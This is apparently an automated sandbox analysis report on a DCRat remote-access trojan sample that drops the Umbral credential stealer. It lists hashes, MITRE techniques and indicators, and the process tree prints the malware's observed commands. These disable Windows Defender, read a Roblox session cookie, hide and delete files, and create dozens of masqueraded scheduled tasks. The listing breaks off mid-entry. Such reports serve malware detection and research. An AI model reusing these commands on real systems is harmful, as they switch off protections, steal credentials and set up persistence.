dcrat | 907db29b2c876bb0d033191aa466ad381c3d08f02086dca05933425a0bda17bd

Analysis

max time kernel
144s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2024 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DCRatBuild.exe
Size

1.1MB
MD5

707f1e7f047000becec893e08d9205f4
SHA1

4db17e1f568b260016d676f04e0e5cf457cb8911
SHA256

907db29b2c876bb0d033191aa466ad381c3d08f02086dca05933425a0bda17bd
SHA512

7cd10ad35a1a6961fadd467606360896eeecb59c415ab9de5c74647a6b6ac103b76a51dc5dd03fd8fe19212534405842d570811350347cd1a946f38132d6d9cd
SSDEEP

24576:U2G/nvxW3Ww0tm9c02WO+YZcSUNYuMBr7D:UbA30m9cKYfPl

Score

10^/10

dcrat umbral credential_access discovery execution infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0003000000022e13-54.dat	family_umbral
behavioral1/memory/4956-61-0x0000027C23F80000-0x0000027C23FC0000-memory.dmp	family_umbral

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	848	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3764	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3320	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	640	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	852	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3308	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4704	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4524	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4944	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2168	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2280	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3392	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4288	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3108	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3588	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1548	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3248	3120	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	3120	schtasks.exe	91

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x00070000000234df-10.dat	dcrat
behavioral1/memory/4520-13-0x0000000000F70000-0x0000000001046000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4084	powershell.exe
3976	powershell.exe
2304	powershell.exe
3884	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	DCRatBuild.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chainreview.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	StartMenuExperienceHost.exe

Executes dropped EXE 3 IoCs

pid	Process
4520	chainreview.exe
3284	StartMenuExperienceHost.exe
4956	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
53	discord.com
54	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ip-api.com

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe	chainreview.exe
File created	C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\ee2ad38f3d4382	chainreview.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\0a1fd5f707cd16	chainreview.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe	chainreview.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\c5b4cb5e9653cc	chainreview.exe
File created	C:\Program Files (x86)\Windows Defender\55b276f4edf653	chainreview.exe
File created	C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\Registry.exe	chainreview.exe
File created	C:\Program Files\ModifiableWindowsApps\cmd.exe	chainreview.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe	chainreview.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SchCache\smss.exe	chainreview.exe
File created	C:\Windows\SchCache\69ddcba757bf72	chainreview.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2772	cmd.exe
4960	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1340	wmic.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	DCRatBuild.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4960	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3588	schtasks.exe
4088	schtasks.exe
848	schtasks.exe
640	schtasks.exe
4280	schtasks.exe
852	schtasks.exe
2248	schtasks.exe
2880	schtasks.exe
4768	schtasks.exe
2896	schtasks.exe
2280	schtasks.exe
1548	schtasks.exe
1552	schtasks.exe
4704	schtasks.exe
4524	schtasks.exe
1704	schtasks.exe
1084	schtasks.exe
2076	schtasks.exe
3676	schtasks.exe
3248	schtasks.exe
3308	schtasks.exe
1988	schtasks.exe
4944	schtasks.exe
2472	schtasks.exe
4288	schtasks.exe
1488	schtasks.exe
2168	schtasks.exe
3392	schtasks.exe
1500	schtasks.exe
1108	schtasks.exe
2980	schtasks.exe
1284	schtasks.exe
3108	schtasks.exe
3764	schtasks.exe
3320	schtasks.exe
824	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
4520	chainreview.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
3284	StartMenuExperienceHost.exe
4956	Umbral.exe
4084	powershell.exe
4084	powershell.exe
3976	powershell.exe
3976	powershell.exe
2304	powershell.exe
2304	powershell.exe
1492	powershell.exe
1492	powershell.exe
3884	powershell.exe
3884	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3284	StartMenuExperienceHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4520	chainreview.exe
Token: SeDebugPrivilege	3284	StartMenuExperienceHost.exe
Token: SeDebugPrivilege	4956	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2572	wmic.exe
Token: SeSecurityPrivilege	2572	wmic.exe
Token: SeTakeOwnershipPrivilege	2572	wmic.exe
Token: SeLoadDriverPrivilege	2572	wmic.exe
Token: SeSystemProfilePrivilege	2572	wmic.exe
Token: SeSystemtimePrivilege	2572	wmic.exe
Token: SeProfSingleProcessPrivilege	2572	wmic.exe
Token: SeIncBasePriorityPrivilege	2572	wmic.exe
Token: SeCreatePagefilePrivilege	2572	wmic.exe
Token: SeBackupPrivilege	2572	wmic.exe
Token: SeRestorePrivilege	2572	wmic.exe
Token: SeShutdownPrivilege	2572	wmic.exe
Token: SeDebugPrivilege	2572	wmic.exe
Token: SeSystemEnvironmentPrivilege	2572	wmic.exe
Token: SeRemoteShutdownPrivilege	2572	wmic.exe
Token: SeUndockPrivilege	2572	wmic.exe
Token: SeManageVolumePrivilege	2572	wmic.exe
Token: 33	2572	wmic.exe
Token: 34	2572	wmic.exe
Token: 35	2572	wmic.exe
Token: 36	2572	wmic.exe
Token: SeIncreaseQuotaPrivilege	2572	wmic.exe
Token: SeSecurityPrivilege	2572	wmic.exe
Token: SeTakeOwnershipPrivilege	2572	wmic.exe
Token: SeLoadDriverPrivilege	2572	wmic.exe
Token: SeSystemProfilePrivilege	2572	wmic.exe
Token: SeSystemtimePrivilege	2572	wmic.exe
Token: SeProfSingleProcessPrivilege	2572	wmic.exe
Token: SeIncBasePriorityPrivilege	2572	wmic.exe
Token: SeCreatePagefilePrivilege	2572	wmic.exe
Token: SeBackupPrivilege	2572	wmic.exe
Token: SeRestorePrivilege	2572	wmic.exe
Token: SeShutdownPrivilege	2572	wmic.exe
Token: SeDebugPrivilege	2572	wmic.exe
Token: SeSystemEnvironmentPrivilege	2572	wmic.exe
Token: SeRemoteShutdownPrivilege	2572	wmic.exe
Token: SeUndockPrivilege	2572	wmic.exe
Token: SeManageVolumePrivilege	2572	wmic.exe
Token: 33	2572	wmic.exe
Token: 34	2572	wmic.exe
Token: 35	2572	wmic.exe
Token: 36	2572	wmic.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeIncreaseQuotaPrivilege	2632	wmic.exe
Token: SeSecurityPrivilege	2632	wmic.exe
Token: SeTakeOwnershipPrivilege	2632	wmic.exe
Token: SeLoadDriverPrivilege	2632	wmic.exe
Token: SeSystemProfilePrivilege	2632	wmic.exe
Token: SeSystemtimePrivilege	2632	wmic.exe
Token: SeProfSingleProcessPrivilege	2632	wmic.exe
Token: SeIncBasePriorityPrivilege	2632	wmic.exe
Token: SeCreatePagefilePrivilege	2632	wmic.exe
Token: SeBackupPrivilege	2632	wmic.exe
Token: SeRestorePrivilege	2632	wmic.exe
Token: SeShutdownPrivilege	2632	wmic.exe
Token: SeDebugPrivilege	2632	wmic.exe
Token: SeSystemEnvironmentPrivilege	2632	wmic.exe
Token: SeRemoteShutdownPrivilege	2632	wmic.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4916 wrote to memory of 4256	4916	DCRatBuild.exe	85
PID 4916 wrote to memory of 4256	4916	DCRatBuild.exe	85
PID 4916 wrote to memory of 4256	4916	DCRatBuild.exe	85
PID 4256 wrote to memory of 2308	4256	WScript.exe	88
PID 4256 wrote to memory of 2308	4256	WScript.exe	88
PID 4256 wrote to memory of 2308	4256	WScript.exe	88
PID 2308 wrote to memory of 4520	2308	cmd.exe	90
PID 2308 wrote to memory of 4520	2308	cmd.exe	90
PID 4520 wrote to memory of 3284	4520	chainreview.exe	128
PID 4520 wrote to memory of 3284	4520	chainreview.exe	128
PID 3284 wrote to memory of 4956	3284	StartMenuExperienceHost.exe	131
PID 3284 wrote to memory of 4956	3284	StartMenuExperienceHost.exe	131
PID 4956 wrote to memory of 2572	4956	Umbral.exe	132
PID 4956 wrote to memory of 2572	4956	Umbral.exe	132
PID 4956 wrote to memory of 4612	4956	Umbral.exe	135
PID 4956 wrote to memory of 4612	4956	Umbral.exe	135
PID 4956 wrote to memory of 4084	4956	Umbral.exe	137
PID 4956 wrote to memory of 4084	4956	Umbral.exe	137
PID 4956 wrote to memory of 3976	4956	Umbral.exe	139
PID 4956 wrote to memory of 3976	4956	Umbral.exe	139
PID 4956 wrote to memory of 2304	4956	Umbral.exe	141
PID 4956 wrote to memory of 2304	4956	Umbral.exe	141
PID 4956 wrote to memory of 1492	4956	Umbral.exe	143
PID 4956 wrote to memory of 1492	4956	Umbral.exe	143
PID 4956 wrote to memory of 2632	4956	Umbral.exe	145
PID 4956 wrote to memory of 2632	4956	Umbral.exe	145
PID 4956 wrote to memory of 1392	4956	Umbral.exe	147
PID 4956 wrote to memory of 1392	4956	Umbral.exe	147
PID 4956 wrote to memory of 3600	4956	Umbral.exe	149
PID 4956 wrote to memory of 3600	4956	Umbral.exe	149
PID 4956 wrote to memory of 3884	4956	Umbral.exe	151
PID 4956 wrote to memory of 3884	4956	Umbral.exe	151
PID 4956 wrote to memory of 1340	4956	Umbral.exe	153
PID 4956 wrote to memory of 1340	4956	Umbral.exe	153
PID 4956 wrote to memory of 2772	4956	Umbral.exe	155
PID 4956 wrote to memory of 2772	4956	Umbral.exe	155
PID 2772 wrote to memory of 4960	2772	cmd.exe	157
PID 2772 wrote to memory of 4960	2772	cmd.exe	157

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4612	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\bridgeproviderserversaves\tGLyZfX8Rw.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\bridgeproviderserversaves\rouG4W2xD34WsMh.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\bridgeproviderserversaves\chainreview.exe
      "C:\bridgeproviderserversaves\chainreview.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4520
    - - C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
        
        "C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3284
      - C:\ProgramData\Umbral.exe
        
        "C:\ProgramData\Umbral.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\ProgramData\Umbral.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData\Umbral.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:1392
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:3600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1340
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\ProgramData\Umbral.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2772
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\bridgeproviderserversaves\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\bridgeproviderserversaves\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\bridgeproviderserversaves\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Local Settings\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Local Settings\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\SchCache\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\SchCache\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\bridgeproviderserversaves\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\bridgeproviderserversaves\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\bridgeproviderserversaves\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\bridgeproviderserversaves\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\bridgeproviderserversaves\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\bridgeproviderserversaves\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\Registry.exe'" /f
1⤵
